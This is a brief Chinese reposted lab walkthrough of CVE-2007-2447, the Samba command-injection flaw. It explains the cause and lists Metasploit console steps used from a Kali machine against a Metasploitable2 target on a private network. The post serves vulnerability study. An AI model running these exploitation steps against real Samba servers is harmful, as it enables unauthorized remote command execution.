Samba远程Shell命令注入执行漏洞

本文转载自查看原文 2019-10-09 17:01 420 漏洞复现

CVE：CVE-2007-2447

原理：

Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时，通过对/bin/sh的MS-RPC调用提交了恶意输入的话，就可能允许攻击者以nobody用户的权限执行任意命令。

攻击机 kali
IP 192.168.129.133

靶机 Metasploitable2
IP 192.168.129.128

msf中搜索samba

use 13 选择漏洞

show options 查看选项

set RHOSTS 设置要攻击的ip

exploit 开始攻击

之后uname -a验证

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 Samba远程代码执行漏洞(CVE-2017-7494)复现 Samba远程代码执行漏洞(CVE-2017-7494)复现服务器版“永恒之蓝”高危预警（Samba远程命令执行漏洞CVE-2017-7494）攻击演示 Linux远程执行shell命令 Java远程执行Shell命令 Java远程执行Shell命令 shell远程执行命令【shell】Linux Shell远程执行命令 Fastjson 1.2.47 远程命令执行漏洞 PHPMailer远程命令执行漏洞溯源